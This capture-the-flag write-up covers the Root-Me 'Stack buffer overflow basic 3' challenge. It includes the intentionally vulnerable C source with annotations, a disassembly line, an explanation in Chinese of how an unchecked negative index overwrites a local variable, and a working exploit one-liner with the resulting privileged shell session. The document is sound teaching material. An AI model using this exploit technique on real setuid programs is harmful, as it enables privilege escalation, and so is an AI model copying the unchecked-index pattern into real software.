Stack buffer overflow basic 3

ELF x86 - Stack buffer overflow basic 3

参考: https://github.com/s1syphu5/RootMe-Challenges/tree/master/System/ELF%20x86%20-%20Stack%20buffer%20overflow%20basic%203

#include <stdio.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

void shell(void);

/*
 * Challenge binary (ELF x86, "Stack buffer overflow basic 3").
 *
 * Reads stdin one byte at a time and stores most bytes at buffer[count].
 * Calls shell() as soon as the local `check` equals 0xbffffabc. The code is
 * deliberately vulnerable; the comments below mark where and why.
 *
 * The exploit depends on the stack layout, not just on the C: the
 * disassembly on this page compares [ebp-0x50] with 0xbffffabc, so `check`
 * lives at ebp-0x50, and the writeup's use of buffer[-4] implies that
 * buffer sits directly above it.
 */
int main()
{

char buffer[64];
/* Never initialised and never assigned anywhere in main: the only way it
 * can become 0xbffffabc is the out-of-bounds store in the default case
 * below. Reading it in the loop is undefined behaviour in its own right. */
int check;
int i = 0;
int count = 0;

printf("Enter your name: ");
fflush(stdout);
while(1)
{
/* Not a bounds check: it only prints a message; the loop continues and the
 * store below still happens. */
if(count >= 64)
printf("Oh no...Sorry !\n");
/* Evaluated once per byte, before the next read, so a byte that lands in
 * `check` takes effect on the following iteration. */
if(check == 0xbffffabc)
shell();
else
{
/* Return value ignored: on EOF/error `i` keeps its previous value and the
 * loop spins forever. Only one byte of the int is written; on little-endian
 * x86 that is the low byte, so `i` holds the raw byte value 0..255 and
 * `case 0x90` below can actually match. */
read(fileno(stdin),&i,1);
switch(i)
{
case '\n':
printf("\a");
break;
/* Backspace: decrements count with no lower bound, so count goes negative
 * after enough 0x08 bytes. Nothing is written for this byte. */
case 0x08:
count--;
printf("\b");
break;
/* 0x04 and 0x90 advance count without storing the byte. */
case 0x04:
printf("\t");
count++;
break;
case 0x90:
printf("\a");
count++;
break;
/* THE BUG: count is not checked in either direction. A negative count
 * writes below buffer (into `check`, per the layout noted above); a count
 * of 64 or more writes past the end of buffer. `i` is truncated to one
 * char on store. */
default:
buffer[count] = i;
count++;
break;
}
}
}
}

/*
 * Win function for the challenge: make the real uid equal to the binary's
 * effective uid, then start /bin/bash.
 *
 * setreuid(euid, euid) is the usual setuid-CTF idiom: bash is documented to
 * reset an effective uid that differs from the real one, so without this the
 * spawned shell would run as the unprivileged caller. The return value of
 * setreuid() is not checked; if it fails, bash still starts, just without
 * the elevated uid.
 */
void shell(void)
{
    uid_t euid = geteuid();
    setreuid(euid, euid);
    system("/bin/bash");
}

0x0804866a <+116>: cmp DWORD PTR [ebp-0x50],0xbffffabc

default 分支的 buffer[count] = i 对 count 没有任何上下界检查：只要让 buffer[count] 指向 check 的地址，这一句就能把输入字节写进 check。
从反汇编可知 check 位于 [ebp-0x50]；exploit 选用 -4 这个偏移，说明 buffer 紧挨在 check 之上（即 buffer 起始于 ebp-0x4c）。先输入 4 个 0x08（退格）：这个分支只执行 count--、不写内存，count 变为 -4；随后的 4 个字节依次写入 buffer[-4]..buffer[-1]，按小端序正好拼成 check == 0xbffffabc。下一轮循环开头的 if(check == 0xbffffabc) 成立，调用 shell()。python print 末尾多出的 '\n' 只会走 case '\n' 响铃，不会写入任何内存。

app-systeme-ch16@challenge02:~$ (python -c 'print "\x08"*4+"\xbc\xfa\xff\xbf"';cat )| ./ch16
Enter your name: id
uid=1216(app-systeme-ch16-cracked) gid=1116(app-systeme-ch16) groups=1116(app-systeme-ch16),100(users)
cat .passwd